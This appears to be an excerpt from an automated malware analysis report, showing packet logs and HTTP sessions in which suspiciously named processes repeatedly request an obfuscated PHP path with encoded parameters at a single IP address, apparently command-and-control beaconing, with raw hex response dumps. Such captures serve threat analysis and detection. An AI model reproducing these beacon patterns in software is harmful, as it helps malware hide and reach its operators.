Apr 23, 2024 14:48:50.488202095 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.488221884 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.488293886 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.488332033 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.488349915 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.488401890 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.488437891 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.488452911 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.488761902 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.488801956 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.488821030 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.488951921 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.489005089 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.490356922 CEST	49724	80	192.168.2.5	82.146.61.164

HTTP Request Dependency Graph

82.146.61.164

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	82.146.61.164	80	4124	C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 14:46:56.537117004 CEST	674	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3 HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:46:56.774808884 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:46:56 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:46:56.775003910 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:46:56.775043011 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:46:56.775099039 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:46:56.775139093 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
Apr 23, 2024 14:46:56.775531054 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:46:56.775569916 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
Apr 23, 2024 14:46:56.775693893 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:46:56.775732040 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:46:56.775852919 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:46:57.013087034 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:46:57.019288063 CEST	650	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3 HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 82.146.61.164
Apr 23, 2024 14:46:57.257025957 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:46:57 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	82.146.61.164	80	5612	C:\Users\Default\Links\ApplicationFrameHost.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 14:47:00.118371964 CEST	610	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:47:00.355285883 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:00 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:47:00.355442047 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:47:00.355483055 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:47:00.355606079 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:47:00.355643988 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
Apr 23, 2024 14:47:00.355850935 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:47:00.355890036 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
Apr 23, 2024 14:47:00.356000900 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:47:00.356040001 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:47:00.356079102 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:47:00.592432976 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:47:00.608383894 CEST	586	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 82.146.61.164
Apr 23, 2024 14:47:00.845458031 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:00 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.5	49714	82.146.61.164	80

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 14:47:32.467160940 CEST	550	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:47:32.704560041 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:32 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:47:32.704819918 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:47:32.704864979 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:47:32.705056906 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:47:32.705096006 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
